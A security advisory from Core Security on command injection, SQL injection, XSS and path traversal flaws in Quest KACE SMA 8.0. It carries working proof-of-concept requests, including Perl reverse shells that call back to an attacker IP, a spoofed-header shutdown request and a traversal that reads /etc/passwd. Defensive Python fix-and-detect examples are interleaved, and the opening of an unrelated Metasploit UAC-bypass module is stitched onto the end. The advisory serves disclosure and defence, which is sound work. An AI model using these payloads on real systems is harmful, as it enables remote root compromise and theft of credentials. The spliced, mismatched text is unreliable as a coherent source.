Quest KACE System Management Appliance 8.0 (Build 8.0.318) XSS / Traversal / Code Execution / SQL Injection

Core Security – Corelabs Advisory
http://corelabs.coresecurity.com/

Quest KACE System Management Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest KACE System Management Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0004
Advisory URL:
http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege
Management [CWE-269], Improper Privilege Management [CWE-269], Improper
Authorization [CWE-285], Improper Neutralization of Special Elements used
in an SQL Command [CWE-89], Improper Neutralization of Special Elements
used in an SQL Command [CWE-89], Improper Neutralization of Input During
Web Page Generation [CWE-79], External Control of File Name or Path
[CWE-73], External Control of File Name or Path [CWE-73]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,
CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,
CVE-2018-11133, CVE-2018-11137, CVE-2018-11141

3. *Vulnerability Description*

From Quest KACE’s website:

“The KACE Systems Management Appliance [1] provides
your growing organization with comprehensive management of network-connected
devices, including servers, PCs, Macs, Chromebooks, tablets, printers,
storage, networking gear and the Internet of Things (IoT). KACE can fulfill
all of your organization’s systems management needs, from initial deployment
to ongoing management and retirement.”

Multiple vulnerabilities were found in the Quest KACE System Management
Virtual Appliance that would allow a remote attacker to gain command
execution as root. We present three vectors to achieve this, including
one that can be exploited as an unauthenticated user.

Additional web application vulnerabilities were found in the web console
that is bundled with the product. These vulnerabilities are detailed in
section 7.

Note: This advisory has limited details on the vulnerabilities because
during the attempted coordinated disclosure process, Quest advised us not
to distribute our original findings to the public or else they would
take legal action. Quest’s definition of “responsible disclosure” can be
found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is ready
and available when the vulnerability details are publicized. We believe
that providing technical details about each finding is necessary to provide
users and organizations with enough information to understand the
implications of the vulnerabilities against their environment and, most
importantly, to prioritize the remediation activities aiming at mitigating
risk.

We regret Quest’s posture on disclosure during the whole process (detailed
in the Report Timeline section) and the impossibility of agreeing on a
coordinated publication date, something we achieve (and have achieved)
with many vendors as part of our coordinated disclosure practices.

4. *Vulnerable Packages*

. Quest KACE System Management Appliance 8.0 (Build 8.0.318)
Other products and versions might be affected too, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest reports that it has released the security vulnerability patch
SEC2018_20180410 to address the reported vulnerabilities.
The patch can be downloaded at
https://support.quest.com/download-install-detail/6086148.

For more details, Quest published the following Security Note:
https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
and Guido Leo from Core Security Consulting Services. The publication of
this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Quest KACE SMA ships with a web console that provides administrators and
users with several features. Multiple vulnerabilities were found in the
context of this console, both from an authenticated and unauthenticated
perspective.

Section 7.1 describes how an unauthenticated attacker could gain command
execution on the system as the web server user.

Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code
execution but would require the attacker to have a valid authentication
token.

In addition, issues found in the Sudo Server module presented in 7.4 and
7.5 would allow the attacker to elevate his privileges from the web server
user to root, effectively obtaining full control of the device.

Additional web application vulnerabilities were found in the console, such
as insufficient authorization for critical functions, which would allow an
anonymous attacker to reconfigure the appliance (7.6), SQL injection
vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path
traversal vulnerabilities, which would allow an attacker to read, write and
delete arbitrary files (7.10, 7.11).

7.1. *Unauthenticated command injection*

[CVE-2018-11138]
The ‘/common/download_agent_installer.php’ script is accessible to anonymous
users in order to download an agent for a specific platform. This behavior
can be abused to execute arbitrary commands on the system.

The script receives the following parameters via the GET method:

. platform: Indicates the platform on which the agent is going to be
installed
. serv: SHA256 hash of a fixed value that depends on each appliance
. orgid: Organization ID
. version: Version number of the agent

The last two conditions are simple to meet. The Agent versions are publicly
available within the Quest KACE site, but even if they were not, we found
that the Organization ID parameter is vulnerable to a time-based SQL
injection (refer to issue 7.7). This would make it possible to obtain the
agent version by querying the table ‘CLIENT_DISTRIBUTION’ and fetching the
contents of the ‘VERSION’ column. The Organization ID is 1 by default, but
could be obtained in the same way as the Agent version by querying the
table ‘ORGANIZATION’ and the column ‘ID’.

As stated above, the application uses the Organization ID and Agent
version parameters to execute commands. This means we need to find a way
to append system commands to the Organization ID without breaking the
SQL query. If we use the comment symbol (#), we can append anything we want
without affecting the result of the query.

Preparing payload:

/-----
- platform = windows
- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c
- orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};';
- version = 8.0.152 (last agent version available for windows)
-----/

The following proof of concept executes a reverse shell:

/-----
GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1
Host: Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
-----/

/-----
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
-----/

7.2. *Authenticated command injection*

[CVE-2018-11139]
The ‘/common/ajax_email_connection_test.php’ script, used to test the
configured SMTP server, is accessible by any authenticated user and can be
abused to execute arbitrary commands on the system. This script is
vulnerable to command injection via the unsanitized user input
‘TEST_SERVER’ sent to the script via the POST method.

The following proof of concept executes a reverse shell:

/-----
POST /common/ajax_email_connection_test.php HTTP/1.1
Host: [ServerIP]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 416
Cookie: [Cookie]
Connection: close

TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&[email protected]&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&[email protected]&ACTION=TEST_CONNECTION_SMTP
-----/

/-----
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
-----/

7.3. *PHP Object Injection leading to arbitrary command execution*

[CVE-2018-11135]
An authenticated user could abuse a deserialization call on the script
‘/adminui/error_details.php’ to inject arbitrary PHP objects.

To exploit this issue, the ‘ERROR_MESSAGES’ parameter needs to be an array
that meets some specific conditions.

7.4. *Privilege escalation via password change in Sudo Server*

[CVE-2018-11134]
In order to perform actions that require higher privileges, the application
relies on a message queue that runs with root privileges and only allows a
set of commands.

One of the available commands allows changing any user’s password
(including root).

Assuming we are able to run commands in the server, we could abuse this
feature by changing the password of the ‘kace_support’ account, which
comes disabled by default but has full sudo privileges.

7.5. *Privilege escalation via command injection in Sudo Server*

[CVE-2018-11132]
As mentioned in the issue [7.4], in order to perform actions that require
higher privileges, the application relies on a message queue that runs
daemonized with root privileges and only allows a set of commands to be
executed.

A command injection vulnerability exists within this message queue which
allows us to append arbitrary commands that will be run as root.

7.6. *Insufficient Authorization for critical function*

[CVE-2018-11142]
The ‘systemui/settings_network.php’ and ‘systemui/settings_patching.php’
scripts are meant to be accessible only from localhost. This restriction can
be bypassed by modifying the ‘Host’ and ‘X-Forwarded-For’ HTTP headers.

The following proof of concept abuses this vulnerability to shut down the
server as an anonymous user:

/-----
POST /systemui/settings_network.php HTTP/1.1
Host: localhost
X-Forwarded-For: ::1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIp]/systemui/settings_network.php
Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129
Content-Length: 3418
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="CSRF_TOKEN"
-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="$shutdown"
DoIt!
Content-Disposition: form-data; name="save"
Save
-----------------------------5642543667001619951434940129--
-----/
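The localhost check as 7.6 describes it, next to one that decides on the socket peer address only, as an added example (not Quest's code); the WSGI-style environ dicts and client addresses are constructed for the demonstration.

```python
"""Localhost-only gating: the header-trusting check that 7.6 bypasses, next to
a check that uses the TCP peer address.

Constructed example; the WSGI-style environ dicts below are assumptions, not
the appliance's request handling.
"""
import ipaddress

LOOPBACK_NETS = (ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128"))


def is_local_request_weak(environ):
    """The pattern 7.6 describes: trusts Host / X-Forwarded-For, both of which the client sets."""
    host = environ.get("HTTP_HOST", "").split(":")[0]
    forwarded = environ.get("HTTP_X_FORWARDED_FOR", "")
    return host == "localhost" or forwarded in ("127.0.0.1", "::1")


def is_local_request(environ):
    """Decide only on REMOTE_ADDR, which comes from the socket, not from a header.

    Also handles the IPv4-mapped form (::ffff:127.0.0.1) that a dual-stack
    listener reports for IPv4 loopback clients.
    """
    try:
        addr = ipaddress.ip_address(environ.get("REMOTE_ADDR", ""))
    except ValueError:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in LOOPBACK_NETS)


def authorize_system_settings(environ):
    """Gate for a settings_network.php-style handler: returns (allowed, reason)."""
    if not is_local_request(environ):
        return False, "client %s is not loopback" % environ.get("REMOTE_ADDR", "?")
    return True, "loopback client"


# Constructed: the header shape of the 7.6 proof of concept, arriving from a remote peer.
SPOOFED = {
    "REMOTE_ADDR": "198.51.100.9",
    "HTTP_HOST": "localhost",
    "HTTP_X_FORWARDED_FOR": "::1",
    "PATH_INFO": "/systemui/settings_network.php",
}
GENUINE_V4 = {"REMOTE_ADDR": "127.0.0.1", "HTTP_HOST": "localhost"}
GENUINE_MAPPED = {"REMOTE_ADDR": "::ffff:127.0.0.1", "HTTP_HOST": "localhost"}

if __name__ == "__main__":
    for name, env in (("spoofed", SPOOFED), ("ipv4", GENUINE_V4), ("mapped", GENUINE_MAPPED)):
        print(name, "weak:", is_local_request_weak(env), "fixed:", is_local_request(env))
```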

7.7. *Unauthenticated SQL Injection in download_agent_installer.php*

[CVE-2018-11136]
The ‘orgID’ parameter received by the ‘/common/download_agent_installer.php’
script is not sanitized, leading to SQL injection, specifically a blind,
time-based one.

The following proof of concept induces a time delay:

/-----
http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152
-----/
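Two defender-side checks for the parameters that 7.1 and 7.7 both abuse, written for this advisory rather than taken from KACE: an allow-list validation of the download_agent_installer.php query, and the same validation run over constructed Apache-style access log lines so that the request shapes shown above can be spotted after the fact. The platform allow-list, the log format and the client addresses are assumptions; the serv value is the one from the advisory.

```python
"""Allow-list validation for the download_agent_installer.php parameters
(issues 7.1 and 7.7) and a detection pass over access log lines.

Constructed example: the platform allow-list and the log line format are
assumptions, not taken from the appliance.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allow-list; a real deployment would take it from the agent catalogue.
PLATFORMS = {"windows", "mac", "linux"}
ORGID_RE = re.compile(r"[0-9]{1,9}")                        # integer only: no '#', ';' or spaces
VERSION_RE = re.compile(r"[0-9]{1,3}(\.[0-9]{1,4}){1,3}")   # e.g. 8.0.152
SERV_RE = re.compile(r"[0-9a-f]{64}")                       # hex SHA256, as 'serv' expects
ENDPOINT = "/common/download_agent_installer.php"


def validate_agent_params(params):
    """Return the reasons a request must be rejected; an empty list means acceptable.

    Every parameter that later reaches a SQL query (orgid) or a command line
    (orgid, version) is matched in full against a strict pattern, so an
    injected '1#;...' or '1 AND SLEEP(10)#' never gets past this point.
    """
    reasons = []
    if params.get("platform", "") not in PLATFORMS:
        reasons.append("platform not in allow-list")
    if not ORGID_RE.fullmatch(params.get("orgid", "")):
        reasons.append("orgid is not a plain integer")
    if not VERSION_RE.fullmatch(params.get("version", "")):
        reasons.append("version is not dotted-numeric")
    if not SERV_RE.fullmatch(params.get("serv", "")):
        reasons.append("serv is not a SHA256 hex digest")
    return reasons


def query_params(target):
    """Decode the query string of a request target into a flat dict (first value wins)."""
    decoded = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {key: values[0] for key, values in decoded.items()}


# Apache combined-log style line (format is a constructed assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (client_ip, reasons) for each agent-download request that fails validation."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match or urlsplit(match.group("target")).path != ENDPOINT:
            continue
        reasons = validate_agent_params(query_params(match.group("target")))
        if reasons:
            hits.append((match.group("ip"), reasons))
    return hits


SERV = "ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c"  # value from the advisory

# Constructed sample log: one legitimate download, one orgid carrying a '#;'
# command suffix (the shape of 7.1), one time-based probe (the shape of 7.7),
# and one unrelated request.
SAMPLE_LOG = [
    f'203.0.113.7 - - [08/Feb/2018:21:50:21 +0000] "GET {ENDPOINT}?platform=windows'
    f'&serv={SERV}&orgid=1&version=8.0.152 HTTP/1.1" 200 4096',
    f'198.51.100.9 - - [08/Feb/2018:21:51:02 +0000] "GET {ENDPOINT}?platform=windows'
    f'&serv={SERV}&orgid=1%23%3bid&version=8.0.152 HTTP/1.1" 200 0',
    f'198.51.100.9 - - [08/Feb/2018:21:51:40 +0000] "GET {ENDPOINT}?platform=windows'
    f'&serv={SERV}&orgid=1+AND+SLEEP(10)%23%3b&version=8.0.152 HTTP/1.1" 200 0',
    '203.0.113.7 - - [08/Feb/2018:21:52:00 +0000] "GET /adminui/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```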

7.8. *SQL Injection in run_report.php*

[CVE-2018-11140]
The ‘reportID’ parameter received by the ‘/common/run_report.php’ script
is not sanitized, leading to SQL injection, specifically an error-based
one.

The following proof of concept retrieves the current database name:

/-----
POST /common/run_report.php HTTP/1.1
Content-Length: 161
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf
-----/

/-----
HTTP/1.1 200 OK
Date: Thu, 08 Feb 2018 21:50:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: [ServerIP]
X-KACE-Version: 8.0.318
X-KBOX-WebServer: [ServerIP]
X-KBOX-Version: 8.0.318
X-KACE-WebServer: [ServerIP]
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Content-Length: 3548
Connection: close
Content-Type: text/html; charset=utf-8

[...SNIPPED...]
<script type="text/javascript" src="/common/js/vendor/html5.js?BUILD=318" /></script>
<![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta http-equiv='refresh'
[...SNIPPED...]
-----/

7.9. *Unauthenticated Cross Site Scripting in run_cross_report.php*

[CVE-2018-11133]
The ‘fmt’ parameter of the ‘/common/run_cross_report.php’ script is
vulnerable to cross-site scripting.

The following proof of concept demonstrates the vulnerability:

/-----
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952
-----/

7.10. *Path traversal in download_attachment.php leading to arbitrary
file read*

[CVE-2018-11137]
The ‘checksum’ parameter of the ‘/common/download_attachment.php’ script can
be abused to read arbitrary files with ‘www’ privileges. The following proof
of concept reads the ‘/etc/passwd’ file. No administrator privileges are
needed to execute this script.

It is worth noting that there are several interesting files that can be
read with ‘www’ privileges, such as all the files located in
‘/kbox/bin/koneas/keys/’ and ‘/kbox/kboxwww/include/globals.inc’,
which contain plaintext passwords.

The following proof of concept demonstrates the vulnerability:

/-----
GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Thu, 18 Jan 2018 17:18:19 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Expires: -1
Pragma: public
Content-Disposition: attachment; filename=""
Content-Transfer-Encoding: Binary
Content-Description: K1000 attachment
Content-Length: 2400
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: k10000.
X-KACE-Version: 8.0.318
X-KBOX-WebServer: k10000.
X-KBOX-Version: 8.0.318
X-KACE-WebServer: k10000.
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: close
Content-Type: application/octet-stream

# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
[...SNIPPED...]
-----/

7.11. *Path traversal in advisory.php leading to arbitrary file
creation/deletion*

[CVE-2018-11141]
The ‘IMAGES_JSON’ and ‘attachments_to_remove[]’ parameters of the
‘/adminui/advisory.php’ script can be abused to write and delete files
respectively. The following proof of concept creates a file located at
‘/kbox/kboxwww/resources/TestWrite’ with the content ‘Sarasa’ (base64
encoded). Files can be at any location where the ‘www’ user has write
permissions.

File deletion could be abused to delete the
‘/kbox/kboxwww/systemui/reports/setup_completed.log’ file. This file’s
existence determines whether the appliance setup wizard is shown or not.

The following proof of concept demonstrates the vulnerability:

/-----
POST /adminui/advisory.php?ID=10 HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIP]/adminui/advisory.php?ID=10
Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100
Content-Length: 1705
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="CSRF_TOKEN"

99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e
-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="IMAGES_JSON"

{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="}
-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="FARRAY[ID]"
[...SNIPPED...]
-----/

Taking advantage of 7.2 and 7.4, we are able to verify the file creation:

/-----
[[email protected] /kbox/kboxwww/resources]# ls -lha
total 32
drwxr-xr-x   2 www  wheel   512B Feb  9 20:40 .
drwxr-xr-x  23 root wheel   512B Nov 14 18:29 ..
-rw-r--r--   1 www  wheel    11B Feb  9 20:40 TestWrite
-----/
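An added example, not the appliance's code, of the path containment that 7.10 (checksum) and 7.11 (IMAGES_JSON) both lack: user-supplied names are normalised and checked against a base directory, and the IMAGES_JSON "<tag>,<base64>" entries from the proof of concept are decoded only when they stay inside it. The base directories and the value format are assumptions drawn from the proofs of concept.

```python
"""Path containment for user-supplied file names, covering the read in 7.10
(checksum) and the write in 7.11 (IMAGES_JSON).

Constructed example, not the appliance's code: the base directories and the
'<tag>,<base64>' value format are assumptions taken from the proofs of concept.
"""
import base64
import json
import posixpath

ATTACHMENT_DIR = "/kbox/kboxwww/attachments"                # assumed base for download_attachment.php
ADVISORY_IMG_DIR = "/kbox/kboxwww/adminui/advisory_images"  # assumed base for advisory.php uploads


def resolve_under(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or None if it escapes.

    The candidate is normalised first so '..' segments collapse, then compared
    with commonpath: a plain startswith() test would wrongly accept
    '/kbox/kboxwww/attachments-evil/x' as living under '/kbox/kboxwww/attachments'.
    On a real filesystem, apply os.path.realpath before the comparison as well,
    so a symlink inside base_dir cannot point back out of it.
    """
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def parse_images_json(raw, base_dir):
    """Split IMAGES_JSON {"name": "<tag>,<base64>"} entries into writable (path, bytes)
    pairs and a list of the names rejected for escaping base_dir."""
    accepted, rejected = [], []
    for name, value in json.loads(raw).items():
        target = resolve_under(base_dir, name)
        if target is None:
            rejected.append(name)
            continue
        _tag, _, payload = value.partition(",")
        accepted.append((target, base64.b64decode(payload, validate=True)))
    return accepted, rejected


# The two user-controlled values from the proofs of concept above.
CHECKSUM_FROM_POC = "/../../../../../../../../../../../etc/passwd"
IMAGES_JSON_FROM_POC = '{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="}'

if __name__ == "__main__":
    print("7.10 checksum resolves to:", resolve_under(ATTACHMENT_DIR, CHECKSUM_FROM_POC))
    print("7.11 entries:", parse_images_json(IMAGES_JSON_FROM_POC, ADVISORY_IMG_DIR))
```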

8. *Report Timeline*

2018-02-26: Core Security (Core) sent an initial notification to Quest
Software Inc. (Quest) via web form.
2018-03-05: Quest Support confirmed the receipt and requested additional
information.
2018-03-12: Core Security sent a draft advisory including a technical
description.
2018-03-16: Quest Support asked for the CVE-IDs.
2018-03-16: Core Security answered saying that the CVE-IDs are required
once the vendor verifies the vulnerabilities. Additionally, Core Security
requested a confirmation about the reported vulnerabilities and a tentative
timescale to fix them. Finally, Core Security requested that Quest use
Core’s advisories-publication email address as the official communication
channel, also copying the researchers behind this discovery.
2018-03-16: Quest Support thanked Core for its reply and stated it would be
in touch during the process.
2018-03-20: Quest Support informed that they had not yet received any
updates from the engineering team and had requested one.
2018-03-21: Quest Support requested information about the KACE version
used for reporting the issues and also Core’s company name and information.
2018-03-21: Core replied with the affected version (that was included in
the original draft advisory) and a link to the Core company website and
the list of previous security advisories.
2018-03-21: Quest Support acknowledged the information provided.
2018-03-26: Quest’s KACE product manager (PM) thanked Core for making it
aware of the security issues found and for the level of thoroughness and
detail provided. Quest specified it already had fixes in place for some of
the issues. Quest’s KACE PM asked for a conference call in order to understand
more about Core’s offerings for future engagements. Finally, Quest’s KACE
PM stated that the work done by Core was in breach of its license agreement,
and requested that Core not distribute the findings to the public, otherwise
Quest would take legal action.
2018-04-13: Quest’s KACE PM sent a follow-up email and informed Core that it
had made a hotfix to patch the reported vulnerabilities. Quest also requested
a call to understand future opportunities based on Core’s company
capabilities. Finally, Quest asked for information about the researchers
who found the vulnerabilities and a link of Core’s choosing to be included
in Quest’s Acknowledgment page
(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements).
2018-04-16: Core answered the email from 2018-03-26, stating that the company
is following standard practices with regard to coordinated vulnerability
disclosure, and also sent detailed technical information about its findings
at Quest’s request. Core also mentioned that Quest seems to be well versed in
the disclosure process and expects vendors to coordinate with it prior to
publication via Quest’s vulnerability reporting process, and that Quest’s
legal threat appears to be in direct contradiction to the disclosure
process that it encourages on its website. Finally, Core asked about
Quest’s intention to work collaboratively to address these vulnerabilities
and to follow industry standard disclosure processes, which involve
publication of the vulnerabilities.
2018-04-17: Quest’s KACE PM replied saying it is willing to collaborate
and is looking forward to having a conversation over the phone in order to
continue the next steps in its vulnerability process (forwarded email from
2018-04-13).
2018-04-17: Core thanked Quest for the answer and stated its preference for
keeping communications between the parties in writing in order to better
document the process, and communicated the next steps of the process:
1. testing the fix (if the vendor agrees), 2. getting CVE-IDs, 3. getting a
vendor link to be included in the advisory and finally 4. sending the final
advisory version to the vendor and coordinating the publication date
together. With regards to Quest’s requests, Core provided the researchers’
names and the URL the advisory will have once published. Finally, Core
stated that the request for other Core company services could be forwarded
to the Core services team if needed (and asked for the right contact at
Quest), but that its intention is to keep that services request separate
from the coordinated disclosure process.
2018-04-18: Quest Support informed Core that patches had been made publicly
available to its customers and unilaterally closed the case.
2018-05-31: Advisory CORE-2018-0004 published.

9. *References*

[1] https://www.quest.com/products/kace-systems-management-appliance/

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber-attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The company’s
threat-aware, identity & access, network security, and vulnerability
management solutions provide actionable insight and context needed to
manage security risks across the enterprise. This shared insight gives
customers a comprehensive view of their security posture to make better
security remediation decisions. Better insight allows organizations to
prioritize their efforts to protect critical assets, take action sooner
to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or [email protected]

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and (c)
2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Windows UAC Protection Bypass (Via Slui File Handler Hijack)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  SLUI_DEL_KEY = "HKCU\\Software\\Classes\\exefile".freeze
  SLUI_WRITE_KEY = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze
  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
  SLUI_PATH = "%WINDIR%\\System32\\slui.exe".freeze
  CMD_MAX_LEN = 16383

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
        'Description' => %q{
          This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
          the Current User hive, and inserting a custom command that will get invoked when any binary
